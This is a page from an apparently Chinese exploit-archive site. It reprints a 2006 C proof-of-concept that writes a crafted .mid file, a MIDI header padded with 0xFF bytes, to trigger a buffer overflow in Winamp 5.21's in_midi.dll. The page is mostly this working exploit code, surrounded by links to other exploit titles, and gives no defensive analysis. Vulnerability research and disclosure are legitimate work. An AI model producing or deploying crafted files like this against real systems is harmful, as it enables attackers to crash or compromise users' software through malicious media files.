首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC
来源:vfocus.net 作者:BassReFLeX 发布时间:2006-06-21  

/*

* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "\x4D\x54\x68\x64\x00\x00"
"\x00\x06\x00\x00\x00\x01"
"\x00\x60\x4D\x54\x72\x6B"
"\x00\x00";

char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF";



int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************** *");
printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("\n* ********************************************** *");
printf("\n* PoC coded by: BassReFLeX *");
printf("\n* Date: 19 Jun 2006 *");
printf("\n* ********************************************** *");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}


printf("\n\nWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("\nFile created successfully!");
printf("\nFile: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Excel Unicode Local
·DataLife Engine <= 4.1 Remo
·Joomla <= 1.0.9 (Weblinks)
·DataLife Engine <= 4.1 Remo
·FlashBB <= 1.1.5 (phpbb_roo
·Jaws <= 0.6.2 (Search gadge
·Mambo <= 4.6rc1 (Weblinks)
·BitchX <= 1.1-final do_hook
·bitweaver <= 1.3 (tmpImageP
·XM Easy Personal FTP Server 5.
·Pico Zip 4.01 (Long Filename)
·MyBulletinBoard (MyBB) <= 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved